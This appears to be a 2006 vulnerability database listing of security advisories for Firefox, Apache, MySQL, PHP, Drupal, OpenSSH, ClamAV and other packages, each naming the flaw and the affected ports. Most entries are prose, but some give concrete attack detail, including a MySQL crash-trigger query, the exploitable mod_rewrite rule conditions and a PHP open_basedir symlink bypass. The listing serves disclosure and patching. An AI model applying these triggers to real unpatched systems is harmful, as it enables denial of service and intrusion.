| 2006-11-02* | The Mozilla Foundation reports multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2006-64 Crashes with evidence of memory corruption (rv:1.8.0.7) MFSA 2006-63 JavaScript execution in mail via XBL MFSA 2006-62 Popup-blocker cross-site scripting (XSS) MFSA 2006-61 Frame spoofing using document.open() MFSA 2006-60 RSA Signature Forgery MFSA 2006-59 Concurrency-related vulnerability MFSA 2006-58 Auto-Update compromise through DNS and SSL spoofing MFSA 2006-57 JavaScript Regular Expression Heap Corruption more... | firefox linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2006-11-02* | A Mozilla Foundation Security Advisory reports multiple issues, several of which can be used to run arbitrary code with the privilege of the user running the program. MFSA 2006-56 chrome: scheme loading remote content MFSA 2006-55 Crashes with evidence of memory corruption (rv:1.8.0.5) MFSA 2006-54 XSS with XPCNativeWrapper(window).Function(...) MFSA 2006-53 UniversalBrowserRead privilege escalation MFSA 2006-52 PAC privilege escalation using Function.prototype.call MFSA 2006-51 Privilege escalation using named-functions and redefined "new Object()" MFSA 2006-50 JavaScript engine vulnerabilities MFSA 2006-49 Heap buffer overwrite on malformed VCard MFSA 2006-48 JavaScript new Function race condition MFSA 2006-47 Native DOM methods can be hijacked across domains MFSA 2006-46 Memory corruption with simultaneous events MFSA 2006-45 Javascript navigator Object Vulnerability MFSA 2006-44 Code execution through deleted frame reference more... | firefox linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2006-11-01* | The Apache Software Foundation and The Apache HTTP Server Project report: An off-by-one flaw exists in the Rewrite module, mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46, and 2.2 since 2.2.0. Depending on the manner in which Apache HTTP Server was compiled, this software defect may result in a vulnerability which, in combination with certain types of Rewrite rules in the web server configuration files, could be triggered remotely. For vulnerable builds, the nature of the vulnerability can be denial of service (crashing of web server processes) or potentially allow arbitrary code execution. This issue has been rated as having important security impact by the Apache HTTP Server Security Team. This flaw does not affect a default installation of Apache HTTP Server. Users who do not use, or have not enabled, the Rewrite module mod_rewrite are not affected by this issue. This issue only affects installations using a Rewrite rule with the following characteristics: The RewriteRule allows the attacker to control the initial part of the rewritten URL (for example if the substitution URL starts with $1) The RewriteRule flags do NOT include any of the following flags: Forbidden (F), Gone (G), or NoEscape (NE). Please note that ability to exploit this issue is dependent on the stack layout for a particular compiled version of mod_rewrite. If the compiler used to compile Apache HTTP Server has added padding to the stack immediately after the buffer being overwritten, it will not be possible to exploit this issue, and Apache HTTP Server will continue operating normally. The Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs for the responsible reporting of this vulnerability. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2006-10-30* | Dmitri Lenev reports a privilege escalation in MySQL. MySQL evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote and local authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE. more... | mysql-server |
| 2006-10-29 | A vulnerability in the handling of combined UTF-8 characters in screen may allow a user-assisted attacker to crash screen or potentially allow code execution as the user running screen. To exploit this issue the user running screen must in some way interact with the attacker. more... | screen |
| 2006-10-29 | Michal Prokopiuk reports a privilege escalation in MySQL. The vulnerability causes MySQL, when run on case-sensitive filesystems, to allow remote and local authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions. more... | mysql-server |
| 2006-10-22 | Red Hat reports: An integer overflow flaw was found in the way Qt handled pixmap images. The KDE khtml library uses Qt in such a way that untrusted parameters could be passed to Qt, triggering the overflow. An attacker could for example create a malicious web page that when viewed by a victim in the Konqueror browser would cause Konqueror to crash or possibly execute arbitrary code with the privileges of the victim. more... | kdelibs kdelibs-nocups qt qt-copy |
| 2006-10-21 | The Serendipity Team reports: Serendipity failed to correctly sanitize user input on the media manager administration page. The content of GET variables was written into JavaScript strings. By using standard string evasion techniques it was possible to execute arbitrary JavaScript. Additionally Serendipity dynamically created an HTML form on the media manager administration page that contained all variables found in the URL as hidden fields. While the variable values were correctly escaped it was possible to break out by specifying strange variable names. more... | serendipity |
| 2006-10-21* | Rapid7 reports: The NVIDIA Binary Graphics Driver for Linux is vulnerable to a buffer overflow that allows an attacker to run arbitrary code as root. This bug can be exploited both locally or remotely (via a remote X client or an X client which visits a malicious web page). A working proof-of-concept root exploit is included with this advisory. The NVIDIA drivers for Solaris and FreeBSD are also likely to be vulnerable. Disabling Render acceleration in the "nvidia" driver, via the "RenderAccel" X configuration option, can be used as a workaround for this issue. more... | nvidia-driver |
| 2006-10-20 | iDefense Labs reports: Remote exploitation of a heap overflow vulnerability within version 9 of Opera Software's Opera Web browser could allow an attacker to execute arbitrary code on the affected host. A flaw exists within Opera when parsing a tag that contains a URL. A heap buffer with a constant size of 256 bytes is allocated to store the URL, and the tag's URL is copied into this buffer without sufficient bounds checking of its length. more... | linux-opera opera opera-devel |
| 2006-10-20 | Adam Boileau of Security-Assessment.com reports: The Asterisk Skinny channel driver for Cisco SCCP phones (chan_skinny.so) incorrectly validates a length value in the packet header. An integer wrap-around leads to heap overwrite, and arbitrary remote code execution as root. more... | asterisk asterisk-bristuff |
| 2006-10-20* | The Plone Team reports: Plone 2.0.5, 2.1.2, and 2.5-beta1 does not restrict access to the changeMemberPortrait, deletePersonalPortrait and testCurrentPassword methods, which allows remote attackers to modify portraits. more... | plone |
| 2006-10-18 | The Drupal Team reports: A malicious user may entice users to visit a specially crafted URL that may result in the redirection of Drupal form submission to a third-party site. A user visiting the user registration page via such a url, for example, will submit all data, such as his/her e-mail address, but also possible private profile data, to a third-party site. more... | drupal |
| 2006-10-18 | The Drupal Team reports: Visiting a specially crafted page, anywhere on the web, may allow that page to post forms to a Drupal site in the context of the visitor's session. To illustrate; suppose one has an active user 1 session, the most powerful administrator account for a site, to a Drupal site while visiting a website created by an attacker. This website will now be able to submit any form to the Drupal site with the privileges of user 1, either by enticing the user to submit a form or by automated means. An attacker can exploit this vulnerability by changing passwords, posting PHP code or creating new users, for example. The attack is only limited by the privileges of the session it executes in. more... | drupal |
| 2006-10-18 | The Drupal Team reports: A bug in input validation and lack of output validation allows HTML and script insertion on several pages. Drupal's XML parser passes unescaped data to watchdog under certain circumstances. A malicious user may execute an XSS attack via a specially crafted RSS feed. This vulnerability exists on systems that do not use PHP's mb_string extension (to check if mb_string is being used, navigate to admin/settings and look under "String handling"). Disabling the aggregator module provides an immediate workaround. The aggregator module, profile module, and forum module do not properly escape output of certain fields. Note: XSS attacks may lead to administrator access if certain conditions are met. more... | drupal |
| 2006-10-18 | The Horde team reports a vulnerability within Ingo, the filter management suite. The vulnerability is caused due to inadequate escaping, possibly allowing a local user to execute arbitrary shell commands via procmail. more... | ingo |
| 2006-10-17* | Stefan Esser reports: The PHP 5 branch of the PHP source code lacks the protection against possible integer overflows inside ecalloc() that is present in the PHP 4 branch and also for several years part of our Hardening-Patch and our new Suhosin-Patch. It was discovered that such an integer overflow can be triggered when user input is passed to the unserialize() function. Earlier vulnerabilities in PHP's unserialize() that were also discovered by one of our audits in December 2004 are unrelated to the newly discovered flaw, but they have shown that the unserialize() function is exposed to user-input in many popular PHP applications. Examples for applications that use the content of COOKIE variables with unserialize() are phpBB and Serendipity. The successful exploitation of this integer overflow will result in arbitrary code execution. more... | mod_php5 php5 php5-cgi php5-cli php5-dtc php5-horde php5-nms |
| 2006-10-17* | The Apple Security Team reports that there are multiple vulnerabilities within QuickTime (one of the plugins for win32-codecs). A remote attacker capable of creating a malicious SGI image, FlashPix, FLC movie, or a QuickTime movie can possibly lead to execution of arbitrary code or cause a Denial of Service (application crash). Users who have QuickTime (/win32-codecs) as a browser plugin may be vulnerable to remote code execution by visiting a website containing a malicious SGI image, FlashPix, FLC movie or a QuickTime movie. more... | win32-codecs |
| 2006-10-16 | Secunia reports: Two vulnerabilities have been reported in Clam AntiVirus, which potentially can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. 1) An unspecified error in the CHM unpacker in chmunpack.c can be exploited to cause a DoS. 2) An unspecified error in rebuildpe.c when rebuilding PE files after unpacking can be exploited to cause a heap-based buffer overflow. more... | clamav clamav-devel |
| 2006-10-16* | Stefan Esser reports: PHP's open_basedir feature is meant to disallow scripts to access files outside a set of configured base directories. The checks for this are placed within PHP functions dealing with files before the actual open call is performed. Obviously there is a little span of time between the check and the actual open call. During this time span the checked path could have been altered and point to a file that is forbidden to be accessed due to open_basedir restrictions. Because the open_basedir restrictions often do not call PHP functions but 3rd party library functions to actually open the file it is impossible to close this time span in a general way. It would only be possible to close it when PHP handles the actual opening on its own. While it seems hard to change the path during this little time span it is very simple with the use of the symlink() function combined with a little trick. PHP's symlink() function ensures that source and target of the symlink operation are allowed by open_basedir restrictions (and safe_mode). However it is possible to point a symlink to any file by the use of mkdir(), unlink() and at least two symlinks. more... | mod_php4 mod_php5 php-suhosin php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php5 php5-cgi php5-cli php5-dtc php5-horde php5-nms |
| 2006-10-15 | Javier Fernández-Sanguino Peña reports a vulnerability in tkdiff which allows local users to gain the privileges of the user running tkdiff due to insecure temporary file creation. more... | tkdiff |
| 2006-10-15 | Dedi Dwianto a.k.a the_day reports: Input passed to the "$calpath" parameter in update.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. more... | vtiger |
| 2006-10-15* | Steven Roddis reports that User-Agent string is not properly escaped when handled by torrentflux. This allows for arbitrary code insertion. more... | torrentflux |
| 2006-10-15* | Secunia reports: Arai has reported a vulnerability in Movable Type and Movable Type Enterprise, which can be exploited by malicious people to conduct cross-site scripting attacks. Some unspecified input passed via the search functionality isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | MT |
| 2006-10-15* | Secunia reports: A vulnerability has been reported in Plans, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "evt_id" parameter in "plans.cgi" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that SQL database support has been enabled in "plans_config.pl" (the default setting is flat files). Some vulnerabilities have been reported in Plans, which can be exploited by malicious people to conduct cross-site scripting attacks or gain knowledge of sensitive information. Input passed to various unspecified parameters is not properly sanitised before being returned to users. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site. An unspecified error can be exploited to gain knowledge of the MySQL password. more... | plans |
| 2006-10-15* | eyeOS team reports: [EyeOS 0.9.1] release fixes two XSS security bugs, so we recommend all users to upgrade to this new version in order to have the best security. These two bugs were discovered by Jose Carlos Norte, who is a new eyeOS developer. more... | eyeOS |
| 2006-10-12 | Secunia reports: Clam AntiVirus have a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a stack overflow when scanning messages with deeply nested multipart content. This can be exploited to crash the service by sending specially crafted emails to a vulnerable system. more... | clamav clamav-devel |
| 2006-10-11* | Secunia reports: Will Drewry has reported some vulnerabilities in Cscope, which potentially can be exploited by malicious people to compromise a vulnerable system. Various boundary errors within the parsing of file lists or the expansion of environment variables can be exploited to cause stack-based buffer overflows when parsing specially crafted "cscope.lists" files or directories. A boundary error within the parsing of command line arguments can be exploited to cause a stack-based buffer overflow when supplying an overly long "reffile" argument. Successful exploitation may allow execution of arbitrary code. more... | cscope |
| 2006-10-09* | Gentoo reports: Andrea Barisani of Gentoo Linux discovered xzgv and zgv allocate insufficient memory when rendering images with more than 3 output components, such as images using the YCCK or CMYK colour space. When xzgv or zgv attempt to render the image, data from the image overruns a heap allocated buffer. An attacker may be able to construct a malicious image that executes arbitrary code with the permissions of the xzgv or zgv user when attempting to render the image. more... | xzgv zgv |
| 2006-10-08* | Benjamin C. Wiley Sittler reports: I discovered a [buffer overrun in repr() for unicode strings]. This causes an unpatched non-debug wide (UTF-32/UCS-4) build of python to abort. Ubuntu security team reports: If an application uses repr() on arbitrary untrusted data, this [bug] could be exploited to execute arbitrary code with the privileges of the python application. more... | python python+ipv6 |
| 2006-10-08* | According to Python Security Advisory PSF-2005-001, The Python development team has discovered a flaw in the SimpleXMLRPCServer library module which can give remote attackers access to internals of the registered object or its module or possibly other modules. The flaw only affects Python XML-RPC servers that use the register_instance() method to register an object without a _dispatch() method. Servers using only register_function() are not affected. On vulnerable XML-RPC servers, a remote attacker may be able to view or modify globals of the module(s) containing the registered instance's class(es), potentially leading to data loss or arbitrary code execution. If the registered object is a module, the danger is particularly serious. For example, if the registered module imports the os module, an attacker could invoke the os.system() function. Note: This vulnerability affects your system only if you're running SimpleXMLRPCServer-based server. This isn't harmful at all if you don't run any internet server written in Python or your server doesn't serve in XML-RPC protocol. more... | python python+ipv6 |
| 2006-10-05 | James Bercegay reports: Mambo is vulnerable to an Authentication Bypass issue that is due to an SQL Injection in the login function. The SQL Injection is possible because the $passwd variable is only sanitized when it is not passed as an argument to the function. Omid reports: There are several sql injections in Mambo 4.6 RC2 & Joomla 1.0.10 (and maybe other versions): When a user edits a content, the "id" parameter is not checked properly in /components/com_content/content.php, which can cause 2 sql injections. The "limit" parameter in the administration section is not checked. This affects many pages of the administration section. In the administration section, while editing/creating a user, the "gid" parameter is not checked properly. more... | mambo |
| 2006-10-05 | Urs Janssen and Aleksey Salow report possible buffer overflows in tin versions 1.8.0 and 1.8.1. OpenPKG project elaborates there is an allocation off-by-one bug in version 1.8.0 which can lead to a buffer overflow. more... | tin zh-tin |
| 2006-10-05 | Howard Chu reports: An ACL of the form 'access to dn.subtree="ou=groups, dc=example,dc=com" attr=member by * selfwrite' is intended to only allow users to add/delete their own DN to the target attribute. Currently it allows any DNs to be modified. more... | openldap-sasl-server openldap-server |
| 2006-10-05 | Sebastian Krahmer reports: Sebastian Krahmer of the SuSE security team discovered that the System.CodeDom.Compiler classes used temporary files in an insecure way. This could allow a symbolic link attack to create or overwrite arbitrary files with the privileges of the user invoking the program. Under some circumstances, a local attacker could also exploit this to inject arbitrary code into running Mono processes. more... | mono |
| 2006-10-05* | The Team Mambo reports that two SQL injection vulnerabilities have been found in Mambo. The vulnerabilities exist due to missing sanitization of the title and catid parameters in the weblinks.php page and can lead to execution of arbitrary SQL code. more... | mambo |
| 2006-10-05* | A Project cURL Security Advisory reports: libcurl uses the given file part of a TFTP URL in a manner that allows a malicious user to overflow a heap-based memory buffer due to the lack of boundary check. This overflow happens if you pass in a URL with a TFTP protocol prefix ("tftp://"), using a valid host and a path part that is longer than 512 bytes. The affected flaw can be triggered by a redirect, if curl/libcurl is told to follow redirects and an HTTP server points the client to a tftp URL with the characteristics described above. more... | curl linux-curl |
| 2006-10-05* | Ulf Härnhammar reports: When Lynx connects to an NNTP server to fetch information about the available articles in a newsgroup, it will call a function called HTrjis() with the information from certain article headers. The function adds missing ESC characters to certain data, to support Asian character sets. However, it does not check if it writes outside of the char array buf, and that causes a remote stack-based buffer overflow. more... | ja-lynx lynx lynx-ssl |
| 2006-10-04* | Secunia reports: Mailman can be exploited by malicious people to conduct cross-site scripting and phishing attacks, and cause a DoS (Denial of Service). 1) An error in the logging functionality can be exploited to inject a spoofed log message into the error log via a specially crafted URL. Successful exploitation may trick an administrator into visiting a malicious web site. 2) An error in the processing of malformed headers which do not follow the RFC 2231 standard can be exploited to cause a DoS (Denial of Service). 3) Some unspecified input isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | ja-mailman mailman mailman-with-htdig |
| 2006-10-03* | phpMyAdmin team reports: We received a security advisory from Stefan Esser (sesser@hardened-php.net) and we wish to thank him for his work. It was possible to inject arbitrary SQL commands by forcing an authenticated user to follow a crafted link. more... | phpMyAdmin |
| 2006-10-02 | SecurityTracker reports: A vulnerability was reported in FreeType. A remote user can cause arbitrary code to be executed on the target user's system. A remote user can create a specially crafted font file that, when loaded by the target user's system, will trigger an integer underflow or integer overflow and crash the application or execute arbitrary code on the target system. Chris Evans reported these vulnerabilities. Impact: A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system. more... | freetype2 |
| 2006-10-02 | Secunia reports: A vulnerability has been reported in GnuTLS, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an error in the verification of certain signatures. If a RSA key with exponent 3 is used, it may be possible to forge PKCS #1 v1.5 signatures signed with that key. more... | gnutls gnutls-devel |
| 2006-10-02* | Secunia reports: rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "TARGET_FN" parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via directory traversal attacks in combination with DokuWiki's file upload feature to execute arbitrary PHP code. CVE Mitre reports: Direct static code injection vulnerability in doku.php in DokuWiki before 2006-03-09c allows remote attackers to execute arbitrary PHP code via the X-FORWARDED-FOR HTTP header, which is stored in config.php. Unrestricted file upload vulnerability in lib/exe/media.php in DokuWiki before 2006-03-09c allows remote attackers to upload executable files into the data/media folder via unspecified vectors. DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug". more... | dokuwiki dokuwiki-devel |
| 2006-10-02* | Secunia reports: Some vulnerabilities have been reported in DokuWiki, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Input passed to the "w" and "h" parameters in lib/exec/fetch.php is not properly sanitised before being passed as resize parameters to the "convert" application. This can be exploited to cause a DoS due to excessive CPU and memory consumption by passing very large numbers, or to inject arbitrary shell commands by passing specially crafted strings to the "w" and "h" parameter. Successful exploitation requires that the "$conf[imconvert]" option is set. more... | dokuwiki dokuwiki-devel |
| 2006-10-01* | The Debian Security Team reports: Michael Gehring discovered several potential out-of-bounds index accesses in gtetrinet, a multiplayer Tetris-like game, which may allow a remote server to execute arbitrary code. more... | gtetrinet |
| 2006-09-30 | Problem Description: The CRC compensation attack detector in the sshd(8) daemon, upon receipt of duplicate blocks, uses CPU time cubic in the number of duplicate blocks received. [CVE-2006-4924] A race condition exists in a signal handler used by the sshd(8) daemon to handle the LoginGraceTime option, which can potentially cause some cleanup routines to be executed multiple times. [CVE-2006-5051] Impact: An attacker sending specially crafted packets to sshd(8) can cause a Denial of Service by using 100% of CPU time until a connection timeout occurs. Since this attack can be performed over multiple connections simultaneously, it is possible to cause up to MaxStartups (10 by default) sshd processes to use all the CPU time they can obtain. [CVE-2006-4924] The OpenSSH project believes that the race condition can lead to a Denial of Service or potentially remote code execution, but the FreeBSD Security Team has been unable to verify the exact impact. [CVE-2006-5051] Workaround: The attack against the CRC compensation attack detector can be avoided by disabling SSH Protocol version 1 support in sshd_config(5). There is no workaround for the second issue. more... | openssh openssh-portable |
| 2006-09-30 | Secunia reports: Thomas Pollet has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to the "highlight" parameter in tiki-searchindex.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. rgod has discovered a vulnerability in TikiWiki, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to the "jhot.php" script not correctly verifying uploaded files. This can e.g. be exploited to execute arbitrary PHP code by uploading a malicious PHP script to the "img/wiki" directory. more... | tikiwiki |
| 2006-09-30 | CVE Mitre reports: PunBB 1.2.12 does not properly handle an avatar directory pathname ending in %00, which allows remote authenticated administrative users to upload arbitrary files and execute code, as demonstrated by a query to admin_options.php with an avatars_dir parameter ending in %00. NOTE: this issue was originally disputed by the vendor, but the dispute was withdrawn on 20060926. more... | punbb |
| 2006-09-26 | Secunia reports: Luigi Auriemma has reported a vulnerability in Freeciv, which can be exploited by malicious people to cause a DoS (Denial of Service). An error in the "generic_handle_player_attribute_chunk()" function in common/packets.c can be exploited to crash the service via a specially crafted PACKET_PLAYER_ATTRIBUTE_CHUNK packet sent to the server. An error in the "handle_unit_orders()" function in server/unithand.c can be exploited to crash the service via a specially crafted packet. more... | freeciv freeciv-gtk freeciv-gtk2 freeciv-nox11 |
| 2006-09-26 | Secunia reports: Luigi Auriemma has reported a vulnerability in Freeciv, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within the handling of the packet length in "common/packets.c". This can be exploited to crash the Freeciv server via a specially crafted packet with the size set to "0xffff". more... | freeciv freeciv-gtk freeciv-gtk2 freeciv-nox11 |
| 2006-09-26* | Ulf Härnhammar reports: There are buffer overflows when extracting, testing or listing specially prepared ACE archives. There are directory traversal bugs when extracting ACE archives. There are also buffer overflows when dealing with long (>17000 characters) command line arguments. Secunia reports: The vulnerabilities have been confirmed in version 1.2b. One of the buffer overflow vulnerabilities has also been reported in versions 2.04, 2.2 and 2.5. Other versions may also be affected. Successful exploitation may allow execution of arbitrary code. more... | linux-unace unace |
| 2006-09-22 | Mitre CVE reports: Stack-based buffer overflow in libmms, as used by (a) MiMMS 0.0.9 and (b) xine-lib 1.1.0 and earlier, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via the (1) send_command, (2) string_utf16, (3) get_data, and (4) get_media_packet functions, and possibly other functions. more... | libmms libxine |
| 2006-09-22 | Opera reports: A specially crafted digital certificate can bypass Opera's certificate signature verification. Forged certificates can contain any false information the forger chooses, and Opera will still present it as valid. Opera will not present any warning dialogs in this case, and the security status will be the highest possible (3). This defeats the protection against "man in the middle", the attacks that SSL was designed to prevent. There is a flaw in OpenSSL's RSA signature verification that affects digital certificates using 3 as the public exponent. Some of the certificate issuers that are on Opera's list of trusted signers have root certificates with 3 as the public exponent. The forged certificate can appear to be signed by one of these. more... | linux-opera opera opera-devel |
| 2006-09-14* | The PHP development team reports: Added missing safe_mode/open_basedir checks inside the error_log(), file_exists(), imap_open() and imap_reopen() functions. Fixed overflows inside str_repeat() and wordwrap() functions on 64bit systems. Fixed possible open_basedir/safe_mode bypass in cURL extension and with realpath cache. Fixed overflow in GD extension on invalid GIF images. Fixed a buffer overflow inside sscanf() function. Fixed an out of bounds read inside stripos() function. Fixed memory_limit restriction on 64 bit system. more... | mod_php4 mod_php5 php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php5 php5-cgi php5-cli php5-dtc php5-horde php5-nms |
| 2006-09-13 | The Drupal Project reports: It is possible for a malicious user to spoof a user's identity by bypassing the login redirection mechanism in the pubcookie module. The malicious user may gain the privileges of the user they are spoofing, including the administrative user. more... | drupal-pubcookie |
| 2006-09-12 | Adobe reports: Multiple input validation errors have been identified in Flash Player 8.0.24.0 and earlier versions that could lead to the potential execution of arbitrary code. These vulnerabilities could be accessed through content delivered from a remote location via the user's web browser, email client, or other applications that include or reference the Flash Player. (CVE-2006-3311, CVE-2006-3587, CVE-2006-3588) These updates include changes to prevent circumvention of the "allowScriptAccess" option. (CVE-2006-4640) more... | linux-flashplugin |
| 2006-09-12* | Oliver Karow discovered cross-site scripting issues in the Apache Jakarta Tomcat manager. The developers refer to the issues as minor. more... | jakarta-tomcat |
| 2006-09-12* | Pluf has discovered a vulnerability in Sun Java JDK/SDK, which potentially can be exploited by malicious people to compromise a user's system. The jar tool does not check properly if the files to be extracted have the string "../" on its names, so it's possible for an attacker to create a malicious jar file in order to overwrite arbitrary files within the filesystem. more... | diablo-jdk diablo-jdk-freebsd6 jdk linux-blackdown-jdk linux-ibm-jdk linux-jdk linux-sun-jdk |
| 2006-09-03* | 3APA3A reports: If a programmer fails to check the socket number before using select() or fd_set macros, it's possible to overwrite memory behind the fd_set structure. Very few select() based applications actually check the FD_SETSIZE value. [...] Depending on the vulnerable application it's possible to overwrite portions of memory. Impact is close to off-by-one overflows; code execution doesn't seem exploitable. more... | 3proxy bld bnc citadel dante gatekeeper jabber rinetd |
| 2006-09-02 | Kefka reports multiple cross site scripting vulnerabilities within hlstats. The vulnerabilities are caused due to improper checking of variables, allowing an attacker to perform cross site scripting. more... | hlstats |
| 2006-08-30 | The Joomla development team reports multiple vulnerabilities within the Joomla application: improper validation in the mosMail function; improper validation in the JosIsValidEmail function; remote code execution in PEAR.php; a Zend Hash del key or index vulnerability. more... | joomla |
| 2006-08-17 | Secunia reports: Some vulnerabilities have been reported in Horde, which can be exploited by malicious people to conduct phishing and cross-site scripting attacks. Input passed to the "url" parameter in index.php isn't properly verified before it is being used to include an arbitrary web site in a frameset. This can e.g. be exploited to trick a user into believing certain malicious content is served from a trusted web site. Some unspecified input passed in index.php isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | horde imp |
| 2006-08-15 | The Globus Alliance reports: The proxy generation tool (grid-proxy-init) creates the file, secures the file to provide access only to the owner and writes the proxy to the file. A race condition exists between the opening of the proxy credentials file, and making sure it is a safe file to write to. The checks to ensure this file is accessible only to the owner take place using the filename after the file is opened for writing, but before any data is written. Various components of the toolkit use files in shared directories to store information, some being sensitive information. For example, the tool to create proxy certificates stores the generated proxy certificate by default in /tmp. Specific vulnerabilities in handling such files were reported in myproxy-admin-adduser, grid-ca-sign and grid-security-config. more... | globus |
| 2006-08-15* | Javier Fernández-Sanguino Peña reports two temporary file vulnerabilities within f2c. The vulnerabilities are caused due to weak temporary file handling. An attacker could create a symbolic link, causing a local user running f2c to overwrite the symlinked file. This could give the attacker elevated privileges. more... | f2c |
| 2006-08-13 | Ludwig Nussel reports that x11vnc is vulnerable to an authentication bypass vulnerability. The vulnerability is caused by an error in auth.c. This could allow a remote attacker to gain unauthorized and unauthenticated access to the system. more... | x11vnc |
| 2006-08-13 | Luigi Auriemma reports three vulnerabilities within alsaplayer: The function which handles the HTTP connections is vulnerable to a buffer-overflow that happens when it uses sscanf for copying the URL in the Location field received from the server into the redirect buffer of only 1024 bytes declared in http_open. A buffer-overflow exists in the functions which add items to the playlist when the GTK interface is used (so the other interfaces are not affected by this problem): new_list_item and CbUpdated in interface/gtk/PlaylistWindow.cpp. AlsaPlayer automatically queries the CDDB server specified in its configuration (by default freedb.freedb.org) when the user chooses the CDDA function for playing audio CDs. The function which queries the server uses a buffer of 20 bytes and one of 9 for storing the category and ID strings received from the server, while the buffer which contains this server's response is 32768 bytes long. Naturally for exploiting this bug the attacker must have control of the freedb server specified in the AlsaPlayer's configuration. These vulnerabilities could allow a remote attacker to execute arbitrary code, possibly gaining access to the system. more... | alsaplayer |
| 2006-08-13 | The PostgreSQL development team reports: An attacker able to submit crafted strings to an application that will embed those strings in SQL commands can use invalidly-encoded multibyte characters to bypass standard string-escaping methods, resulting in possible injection of hostile SQL commands into the database. The attacks covered here work in any multibyte encoding. The widely-used practice of escaping ASCII single quote "'" by turning it into "\'" is unsafe when operating in multibyte encodings that allow 0x5c (ASCII code for backslash) as the trailing byte of a multibyte character; this includes at least SJIS, BIG5, GBK, GB18030, and UHC. An application that uses this conversion while embedding untrusted strings in SQL commands is vulnerable to SQL-injection attacks if it communicates with the server in one of these encodings. While the standard client libraries used with PostgreSQL have escaped "'" in the safe, SQL-standard way of "''" for some time, the older practice remains common. more... | ja-postgresql postgresql postgresql-server |
| 2006-08-13 | Multiple vulnerabilities have been reported in various versions of PostgreSQL: The EXECUTE restrictions can be bypassed by using the AGGREGATE function, which is missing a permissions check. A buffer overflow exists in gram.y which could allow an attacker to execute arbitrary code by sending a large number of arguments to a refcursor function. The intagg contributed module allows an attacker to crash the server (Denial of Service) by constructing a maliciously crafted array. more... | ja-postgresql postgresql postgresql-server |
| 2006-08-13 | Jean-David Maillefer reports a Denial of Service vulnerability within MySQL. The vulnerability is caused by improper checking in the date_format routine, which causes the MySQL server to crash. The crash is triggered by the following code: `SELECT date_format('%d%s', 1);` more... | mysql-server |
| 2006-08-13* | The PostgreSQL team reports: Due to inadequate validity checking, a user could exploit the special case that SET ROLE normally uses to restore the previous role setting after an error. This allowed ordinary users to acquire superuser status, for example. more... | postgresql-server |
| 2006-08-12 | The SquirrelMail developers report: A logged in user could overwrite random variables in compose.php, which might make it possible to read/write other users' preferences or attachments. more... | ja-squirrelmail squirrelmail |
| 2006-08-10 | The Ruby on Rails blog reports: With Rails 1.1.0 through 1.1.5 (minus the short-lived 1.1.3), you can trigger the evaluation of Ruby code through the URL because of a bug in the routing code of Rails. This means that you can essentially take down a Rails process by starting something like /script/profiler, as the code will run for a long time and that process will be hung while it happens. Other URLs can even cause data loss. more... | rubygem-rails |
| 2006-08-08 | Clamav team reports: A heap overflow vulnerability was discovered in libclamav which could cause a denial of service or allow the execution of arbitrary code. The problem is specifically located in the PE file rebuild function used by the UPX unpacker. Relevant code from libclamav/upx.c: `memcpy(dst, newbuf, foffset); *dsize = foffset; free(newbuf); cli_dbgmsg("UPX: PE structure rebuilt from compressed file\n"); return 1;` Due to improper validation it is possible to overflow the above memcpy() beyond the allocated memory block. more... | clamav clamav-devel |
| 2006-08-08* | The Drupal project reports: A malicious user can execute a cross site scripting attack by enticing someone to visit a Drupal site via a specially crafted link. more... | drupal |
